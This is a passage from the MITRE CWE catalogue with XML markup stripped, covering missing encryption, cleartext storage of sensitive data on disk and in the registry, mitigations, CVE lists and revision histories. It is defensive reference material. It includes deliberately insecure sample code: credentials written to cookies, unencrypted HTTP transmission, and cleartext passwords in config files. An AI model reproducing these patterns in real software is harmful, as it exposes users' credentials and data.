preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-10 + fixed incorrect manipulation in name (desc was correct). + + + CWE Content Team + MITRE + 2008-10-14 + updated Applicable_Platforms, Description + + + CWE Content Team + MITRE + 2009-07-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-06-21 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-03-29 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2020-02-24 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Path Issue - Directory Doubled Dot Dot Backslash - 'directory\..\..\filename' + Path Traversal: 'dir\..\filename' + + + + The product does not encrypt sensitive or critical information before storage or transmission. + The lack of proper data encryption passes up the guarantees of confidentiality, integrity, and accountability that properly implemented encryption conveys. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + Operation + + + High + + + Confidentiality + Read Application Data + If the application does not use a secure channel, such as SSL, to exchange sensitive information, it is possible for an attacker with access to the network traffic to sniff packets from the connection and uncover the data. This attack is not technically difficult, but does require physical access to some portion of the network over which the sensitive data travels. This access is usually somewhere near where the user is connected to the network (such as a colleague on the company network) but can be anywhere along the path from the user to the end server. + + + Confidentiality + Integrity + Modify Application Data + Omitting the use of encryption in any program which transfers data over a network of any kind should be considered on par with delivering the data sent to each user on the local networks of both the sender and receiver. Worse, this omission allows for the injection of data into a stream of communication between two parties -- with no means for the victims to separate valid data from invalid. In this day of widespread network attacks and password collection sniffers, it is an unnecessary risk to omit encryption from the design of any system which might benefit from it. + + + + + Manual Analysis + The characterizaton of sensitive data often requires domain-specific understanding, so manual methods are useful. However, manual efforts might not achieve desired code coverage within limited time constraints. Black box methods may produce artifacts (e.g. stored data or unencrypted network transfer) that require manual evaluation. + High + + + Automated Analysis + Automated measurement of the entropy of an input/output source may indicate the use or lack of encryption, but human analysis is still required to distinguish intentionally-unencrypted data (e.g. metadata) from sensitive data. + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Network Sniffer + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + Automated Monitored Execution + Man-in-the-middle attack tool + + + + High + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Focused Manual Spotcheck - Focused manual analysis of source + Manual Source Code Review (not inspections) + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Context-configured Source Code Weakness Analyzer + + + + SOAR Partial + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Attack Modeling + + + + High + + + + + Requirements + Clearly specify which data or resources are valuable enough that they should be protected by encryption. Require that any transmission or storage of this data/resource should use well-vetted encryption algorithms. + + + Architecture and Design + + Ensure that encryption is properly integrated into the system design, including but not necessarily limited to: + + Encryption that is needed to store or transmit private data of the users of the system + Encryption that is needed to protect the system itself from unauthorized disclosure or tampering + + Identify the separate needs and contexts for encryption: + + One-way (i.e., only the user or recipient needs to have the key). This can be achieved using public key cryptography, or other techniques in which the encrypting party (i.e., the product) does not need to have access to a private key. + Two-way (i.e., the encryption can be automatically performed on behalf of a user, but the key must be available so that the plaintext can be automatically recoverable by that user). This requires storage of the private key in a format that is recoverable only by the user (or perhaps by the operating system) in a way that cannot be recovered by others. + + Using threat modeling or other techniques, assume that data can be compromised through a separate vulnerability or weakness, and determine where encryption will be most effective. Ensure that data that should be private is not being inadvertently exposed using weaknesses such as insecure permissions (CWE-732). [REF-7] + + + + Architecture and Design + Libraries or Frameworks + + When there is a need to store or transmit sensitive data, use strong, up-to-date cryptographic algorithms to encrypt that data. Select a well-vetted algorithm that is currently considered to be strong by experts in the field, and use well-tested implementations. As with all cryptographic mechanisms, the source code should be available for analysis. + For example, US government systems require FIPS 140-2 certification. + Do not develop custom or private cryptographic algorithms. They will likely be exposed to attacks that are well-understood by cryptographers. Reverse engineering techniques are mature. If the algorithm can be compromised if attackers find out how it works, then it is especially weak. + Periodically ensure that the cryptography has not become obsolete. Some older algorithms, once thought to require a billion years of computing time, can now be broken in days or hours. This includes MD4, MD5, SHA1, DES, and other algorithms that were once regarded as strong. [REF-267] + + + + Architecture and Design + Separation of Privilege + + Compartmentalize the system to have "safe" areas where trust boundaries can be unambiguously drawn. Do not allow sensitive data to go outside of the trust boundary and always be careful when interfacing with a compartment outside of the safe area. + Ensure that appropriate compartmentalization is built into the system design, and the compartmentalization allows for and reinforces privilege separation functionality. Architects and designers should rely on the principle of least privilege to decide the appropriate time to use privileges and the time to drop privileges. + + + + Implementation + Architecture and Design + When using industry-approved techniques, use them correctly. Don't cut corners by skipping resource-intensive steps (CWE-325). These steps are often essential for preventing common attacks. + + + Implementation + Attack Surface Reduction + Use naming conventions and strong types to make it easier to spot when sensitive data is being used. When creating structures, objects, or other complex entities, separate the sensitive and non-sensitive data as much as possible. + Defense in Depth + This makes it easier to spot places in the code where data is being used that is unencrypted. + + + + + This code writes a user's login information to a cookie so the user does not have to login again later. + + function persistLogin($username, $password){$data = array("username" => $username, "password"=> $password);setcookie ("userdata", $data);} + + The code stores the user's username and password in plaintext in a cookie on the user's machine. This exposes the user's login information if their computer is compromised by an attacker. Even if the user's machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie. + Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315). + + + The following code attempts to establish a connection, read in a password, then store it to a buffer. + + server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error("Unknown host");memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length);if (argc < 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error("Connecting");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) { + + write(dfd,password_buffer,n);... + + + + + While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors. + + + The following code attempts to establish a connection to a site to communicate sensitive information. + + try {URL u = new URL("http://www.secret.example.org/");HttpURLConnection hu = (HttpURLConnection) u.openConnection();hu.setRequestMethod("PUT");hu.connect();OutputStream os = hu.getOutputStream();hu.disconnect();}catch (IOException e) { + + + //... + + + } + + Though a connection is successfully made, the connection is unencrypted and it is possible that all sensitive data sent to or received from the server will be read by unintended actors. + + + + + CVE-2009-2272 + password and username stored in cleartext in a cookie + https://www.cve.org/CVERecord?id=CVE-2009-2272 + + + CVE-2009-1466 + password stored in cleartext in a file with insecure permissions + https://www.cve.org/CVERecord?id=CVE-2009-1466 + + + CVE-2009-0152 + chat program disables SSL in some circumstances even when the user says to use SSL. + https://www.cve.org/CVERecord?id=CVE-2009-0152 + + + CVE-2009-1603 + Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption + https://www.cve.org/CVERecord?id=CVE-2009-1603 + + + CVE-2009-0964 + storage of unencrypted passwords in a database + https://www.cve.org/CVERecord?id=CVE-2009-0964 + + + CVE-2008-6157 + storage of unencrypted passwords in a database + https://www.cve.org/CVERecord?id=CVE-2008-6157 + + + CVE-2008-6828 + product stores a password in cleartext in memory + https://www.cve.org/CVERecord?id=CVE-2008-6828 + + + CVE-2008-1567 + storage of a secret key in cleartext in a temporary file + https://www.cve.org/CVERecord?id=CVE-2008-1567 + + + CVE-2008-0174 + SCADA product uses HTTP Basic Authentication, which is not encrypted + https://www.cve.org/CVERecord?id=CVE-2008-0174 + + + CVE-2007-5778 + login credentials stored unencrypted in a registry key + https://www.cve.org/CVERecord?id=CVE-2007-5778 + + + CVE-2002-1949 + Passwords transmitted in cleartext. + https://www.cve.org/CVERecord?id=CVE-2002-1949 + + + CVE-2008-4122 + Chain: Use of HTTPS cookie without "secure" flag causes it to be transmitted across unencrypted HTTP. + https://www.cve.org/CVERecord?id=CVE-2008-4122 + + + CVE-2008-3289 + Product sends password hash in cleartext in violation of intended policy. + https://www.cve.org/CVERecord?id=CVE-2008-3289 + + + CVE-2008-4390 + Remote management feature sends sensitive information including passwords in cleartext. + https://www.cve.org/CVERecord?id=CVE-2008-4390 + + + CVE-2007-5626 + Backup routine sends password in cleartext in email. + https://www.cve.org/CVERecord?id=CVE-2007-5626 + + + CVE-2004-1852 + Product transmits Blowfish encryption key in cleartext. + https://www.cve.org/CVERecord?id=CVE-2004-1852 + + + CVE-2008-0374 + Printer sends configuration information, including administrative password, in cleartext. + https://www.cve.org/CVERecord?id=CVE-2008-0374 + + + CVE-2007-4961 + Chain: cleartext transmission of the MD5 hash of password enables attacks against a server that is susceptible to replay (CWE-294). + https://www.cve.org/CVERecord?id=CVE-2007-4961 + + + CVE-2007-4786 + Product sends passwords in cleartext to a log server. + https://www.cve.org/CVERecord?id=CVE-2007-4786 + + + CVE-2005-3140 + Product sends file with cleartext passwords in e-mail message intended for diagnostic purposes. + https://www.cve.org/CVERecord?id=CVE-2005-3140 + + + + + Failure to encrypt data + + + A8 + Insecure Cryptographic Storage + CWE More Specific + + + A9 + Insecure Communications + CWE More Specific + + + A8 + Insecure Storage + CWE More Specific + + + 4 + Insufficient Transport Layer Protection + + + MSC00-J + Use SSLSocket rather than Socket for secure data exchange + + + SFP23 + Exposed Data + + + + + + + + + + + + + + + + + + + + + + + + + + + + Discouraged + CWE-311 is high-level with more precise children available. It is a level-1 Class (i.e., a child of a Pillar). + Consider children CWE-312: Cleartext Storage of Sensitive Information or CWE-319: Cleartext Transmission of Sensitive Information. + + + + + + There is an overlapping relationship between insecure storage of sensitive information (CWE-922) and missing encryption of sensitive information (CWE-311). Encryption is often used to prevent an attacker from reading the sensitive data. However, encryption does not prevent the attacker from erasing or overwriting the data. + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + Veracode + 2008-08-15 + Suggested OWASP Top Ten 2004 mapping + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences, Other_Notes + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Likelihood_of_Exploit, Name, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Time_of_Introduction + + + CWE Content Team + MITRE + 2010-04-05 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples, Observed_Examples, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2011-03-29 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations, References + + + CWE Content Team + MITRE + 2013-07-17 + updated Relationship_Notes + + + CWE Content Team + MITRE + 2014-02-18 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2014-06-23 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-01-19 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Likelihood_of_Exploit, Modes_of_Introduction, Potential_Mitigations, References, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Related_Attack_Patterns, Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated References, Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + Failure to Encrypt Data + Failure to Encrypt Sensitive Data + + + + The product stores sensitive information in cleartext within a resource that might be accessible to another control sphere. + + Because the information is stored in cleartext (i.e., unencrypted), attackers could potentially read it. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + When organizations adopt cloud services, it can be easier for attackers to access the data from anywhere on the Internet. + In some systems/environments such as cloud, the use of "double encryption" (at both the software and hardware layer) might be required, and the developer might be solely responsible for both layers, instead of shared responsibility with the administrator of the broader system/environment. + + + + + + + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + An attacker with access to the system could read sensitive information stored in cleartext. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Implementation + System Configuration + Operation + When storing data in the cloud (e.g., S3 buckets, Azure blobs, Google Cloud Storage, etc.), use the provider's controls to encrypt the data at rest. [REF-1297] [REF-1299] [REF-1301] + + + + + The following code excerpt stores a plaintext user account ID in a browser cookie. + + response.addCookie( new Cookie("userAccountID", acctID); + + Because the account ID is in plaintext, the user's account information is exposed if their computer is compromised by an attacker. + + + This code writes a user's login information to a cookie so the user does not have to login again later. + + function persistLogin($username, $password){$data = array("username" => $username, "password"=> $password);setcookie ("userdata", $data);} + + The code stores the user's username and password in plaintext in a cookie on the user's machine. This exposes the user's login information if their computer is compromised by an attacker. Even if the user's machine is not compromised, this weakness combined with cross-site scripting (CWE-79) could allow an attacker to remotely copy the cookie. + Also note this example code also exhibits Plaintext Storage in a Cookie (CWE-315). + + + The following code attempts to establish a connection, read in a password, then store it to a buffer. + + server.sin_family = AF_INET; hp = gethostbyname(argv[1]);if (hp==NULL) error("Unknown host");memcpy( (char *)&server.sin_addr,(char *)hp->h_addr,hp->h_length);if (argc < 3) port = 80;else port = (unsigned short)atoi(argv[3]);server.sin_port = htons(port);if (connect(sock, (struct sockaddr *)&server, sizeof server) < 0) error("Connecting");...while ((n=read(sock,buffer,BUFSIZE-1))!=-1) { + + write(dfd,password_buffer,n);... + + + + + While successful, the program does not encrypt the data before writing it to a buffer, possibly exposing it to unauthorized actors. + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + In 2022, the OT:ICEFALL study examined products by 10 different Operational Technology (OT) vendors. The researchers reported 56 vulnerabilities and said that the products were "insecure by design" [REF-1283]. If exploited, these vulnerabilities often allowed adversaries to change how the products operated, ranging from denial of service to changing the code that the products executed. Since these products were often used in industries such as power, electrical, water, and others, there could even be safety implications. + At least one OT product stored a password in plaintext. + + + In 2021, a web site operated by PeopleGIS stored data of US municipalities in Amazon Web Service (AWS) Simple Storage Service (S3) buckets. + + A security researcher found 86 S3 buckets that could be accessed without authentication (CWE-306) and stored data unencrypted (CWE-312). These buckets exposed over 1000 GB of data and 1.6 million files including physical addresses, phone numbers, tax documents, pictures of driver's license IDs, etc. [REF-1296] [REF-1295] + + While it was not publicly disclosed how the data was protected after discovery, multiple options could have been considered. + + The sensitive information could have been protected by ensuring that the buckets did not have public read access, e.g., by enabling the s3-account-level-public-access-blocks-periodic rule to Block Public Access. In addition, the data could have been encrypted at rest using the appropriate S3 settings, e.g., by enabling server-side encryption using the s3-bucket-server-side-encryption-enabled setting. Other settings are available to further prevent bucket data from being leaked. [REF-1297] + + + + Consider the following PowerShell command examples for encryption scopes of Azure storage objects. In the first example, an encryption scope is set for the storage account. + + New-AzStorageEncryptionScope -ResourceGroupName "MyResourceGroup" -AccountName "MyStorageAccount" -EncryptionScopeName testscope -StorageEncryption + + The result (edited and formatted for readability) might be: + + ResourceGroupName: MyResourceGroup, StorageAccountName: MyStorageAccount + + + + + Name + State + Source + RequireInfrastructureEncryption + + + testscope + Enabled + Microsoft.Storage + + + + + + However, the empty string under RequireInfrastructureEncryption indicates this service was not enabled at the time of creation, because the -RequireInfrastructureEncryption argument was not specified in the command. + Including the -RequireInfrastructureEncryption argument addresses the issue: + + New-AzStorageEncryptionScope -ResourceGroupName "MyResourceGroup" -AccountName "MyStorageAccount" -EncryptionScopeName testscope -StorageEncryption -RequireInfrastructureEncryption + + This produces the report: + + ResourceGroupName: MyResourceGroup, StorageAccountName: MyStorageAccount + + + + + Name + State + Source + RequireInfrastructureEncryption + + + testscope + Enabled + Microsoft.Keyvault + True + + + + + In a scenario where both software and hardware layer encryption is required ("double encryption"), Azure's infrastructure encryption setting can be enabled via the CLI or Portal. An important note is that infrastructure hardware encryption cannot be enabled or disabled after a blob is created. Furthermore, the default value for infrastructure encryption is disabled in blob creations. + + + + + CVE-2022-30275 + Remote Terminal Unit (RTU) uses a driver that relies on a password stored in plaintext. + https://www.cve.org/CVERecord?id=CVE-2022-30275 + + + CVE-2009-2272 + password and username stored in cleartext in a cookie + https://www.cve.org/CVERecord?id=CVE-2009-2272 + + + CVE-2009-1466 + password stored in cleartext in a file with insecure permissions + https://www.cve.org/CVERecord?id=CVE-2009-1466 + + + CVE-2009-0152 + chat program disables SSL in some circumstances even when the user says to use SSL. + https://www.cve.org/CVERecord?id=CVE-2009-0152 + + + CVE-2009-1603 + Chain: product uses an incorrect public exponent when generating an RSA key, which effectively disables the encryption + https://www.cve.org/CVERecord?id=CVE-2009-1603 + + + CVE-2009-0964 + storage of unencrypted passwords in a database + https://www.cve.org/CVERecord?id=CVE-2009-0964 + + + CVE-2008-6157 + storage of unencrypted passwords in a database + https://www.cve.org/CVERecord?id=CVE-2008-6157 + + + CVE-2008-6828 + product stores a password in cleartext in memory + https://www.cve.org/CVERecord?id=CVE-2008-6828 + + + CVE-2008-1567 + storage of a secret key in cleartext in a temporary file + https://www.cve.org/CVERecord?id=CVE-2008-1567 + + + CVE-2008-0174 + SCADA product uses HTTP Basic Authentication, which is not encrypted + https://www.cve.org/CVERecord?id=CVE-2008-0174 + + + CVE-2007-5778 + login credentials stored unencrypted in a registry key + https://www.cve.org/CVERecord?id=CVE-2007-5778 + + + CVE-2001-1481 + Plaintext credentials in world-readable file. + https://www.cve.org/CVERecord?id=CVE-2001-1481 + + + CVE-2005-1828 + Password in cleartext in config file. + https://www.cve.org/CVERecord?id=CVE-2005-1828 + + + CVE-2005-2209 + Password in cleartext in config file. + https://www.cve.org/CVERecord?id=CVE-2005-2209 + + + CVE-2002-1696 + Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message. + https://www.cve.org/CVERecord?id=CVE-2002-1696 + + + CVE-2004-2397 + Plaintext storage of private key and passphrase in log file when user imports the key. + https://www.cve.org/CVERecord?id=CVE-2004-2397 + + + CVE-2002-1800 + Admin password in plaintext in a cookie. + https://www.cve.org/CVERecord?id=CVE-2002-1800 + + + CVE-2001-1537 + Default configuration has cleartext usernames/passwords in cookie. + https://www.cve.org/CVERecord?id=CVE-2001-1537 + + + CVE-2001-1536 + Usernames/passwords in cleartext in cookies. + https://www.cve.org/CVERecord?id=CVE-2001-1536 + + + CVE-2005-2160 + Authentication information stored in cleartext in a cookie. + https://www.cve.org/CVERecord?id=CVE-2005-2160 + + + + + Plaintext Storage of Sensitive Information + + + SFP23 + Exposed Data + + + Part 4-2 + Req CR4.1A + + + Part 3-3 + Req SR4.1 + + + + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2010-02-16 + updated References + + + CWE Content Team + MITRE + 2010-06-21 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships + + + CWE Content Team + MITRE + 2013-02-21 + updated Applicable_Platforms, References + + + CWE Content Team + MITRE + 2013-07-17 + updated Description, Relationships, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-05-03 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, References, Relationships + + + CWE Content Team + MITRE + 2018-01-23 + updated Abstraction, Relationships + + + CWE Content Team + MITRE + 2018-03-27 + updated References, Relationships, Type + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships, Type + + + CWE Content Team + MITRE + 2020-02-24 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Applicable_Platforms, Demonstrative_Examples, Description, Observed_Examples, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Demonstrative_Examples, Description, References, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Plaintext Storage of Sensitive Information + + + + The product stores sensitive information in cleartext in a file, or on disk. + The sensitive information could be read by attackers with access to the file, or with physical or administrator access to the raw disk. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following examples show a portion of properties and configuration files for Java and ASP.NET applications. The files include username and password information but they are stored in cleartext. + This Java example shows a properties file with a cleartext username / password pair. + + + + # Java Web App ResourceBundle properties file + ...webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword... + + The following example shows a portion of a configuration file for an ASP.Net application. This configuration file includes username and password information for a connection to a database but the pair is stored in cleartext. + + ...<connectionStrings><add name="ud_DEV" connectionString="connectDB=uDB; uid=db2admin; pwd=password; dbalias=uDB;" providerName="System.Data.Odbc" /></connectionStrings>... + + Username and password information should not be included in a configuration file or a properties file in cleartext as this will allow anyone who can read the file access to the resource. If possible, encrypt this information. + + + + + CVE-2001-1481 + Cleartext credentials in world-readable file. + https://www.cve.org/CVERecord?id=CVE-2001-1481 + + + CVE-2005-1828 + Password in cleartext in config file. + https://www.cve.org/CVERecord?id=CVE-2005-1828 + + + CVE-2005-2209 + Password in cleartext in config file. + https://www.cve.org/CVERecord?id=CVE-2005-2209 + + + CVE-2002-1696 + Decrypted copy of a message written to disk given a combination of options and when user replies to an encrypted message. + https://www.cve.org/CVERecord?id=CVE-2002-1696 + + + CVE-2004-2397 + Cleartext storage of private key and passphrase in log file when user imports the key. + https://www.cve.org/CVERecord?id=CVE-2004-2397 + + + + + Plaintext Storage in File or on Disk + + + SFP23 + Exposed Data + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2010-12-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2013-07-17 + updated Applicable_Platforms, Demonstrative_Examples, Description, Name, Observed_Examples, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2017-11-08 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2021-10-28 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Plaintext Storage in File or on Disk + Plaintext Storage in a File or on Disk + + + + The product stores sensitive information in cleartext in the registry. + Attackers can read the information by accessing the registry key. Even if the information is encoded in a way that is not human-readable, certain techniques could determine which encoding is being used, then decode the information. + + + + + + + + + Architecture and Design + OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase. + + + + + Confidentiality + Read Application Data + + + + + CVE-2005-2227 + Cleartext passwords in registry key. + https://www.cve.org/CVERecord?id=CVE-2005-2227 + + + + + Plaintext Storage in Registry + + + SFP23 + Exposed Data + + + + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Different people use "cleartext" and "plaintext" to mean the same thing: the lack of encryption. However, within cryptography, these have more precise meanings. Plaintext is the information just before it is fed into a cryptographic algorithm, including already-encrypted text. Cleartext is any information that is unencrypted, although it might be in an encoded form that is not easily human-readable (such as base64 encoding). + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + 